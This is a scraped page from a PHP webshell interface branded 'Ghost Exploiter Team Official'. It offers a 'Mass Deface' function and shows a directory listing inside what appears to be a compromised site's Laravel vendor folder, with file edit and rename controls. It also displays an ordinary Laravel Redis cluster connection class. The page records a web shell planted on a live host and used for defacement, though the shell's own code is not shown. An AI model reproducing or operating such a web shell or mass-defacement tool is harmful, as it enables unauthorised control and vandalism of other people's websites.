webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Redis
/
Connections
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Connection.php
5.086KB
edt
ren
PacksPhpRedisValues.php
4.99KB
edt
ren
PhpRedisClusterConnecti
...
0.58KB
edt
ren
PhpRedisConnection.php
13.998KB
edt
ren
PredisClusterConnection
...
0.586KB
edt
ren
PredisConnection.php
1.659KB
edt
ren
<?php namespace Illuminate\Redis\Connections; class PhpRedisClusterConnection extends PhpRedisConnection { /** * Flush the selected Redis database on all master nodes. * * @return mixed */ public function flushdb() { $arguments = func_get_args(); $async = strtoupper((string) ($arguments[0] ?? null)) === 'ASYNC'; foreach ($this->client->_masters() as $master) { $async ? $this->command('rawCommand', [$master, 'flushdb', 'async']) : $this->command('flushdb', [$master]); } } }
<=Back
Liking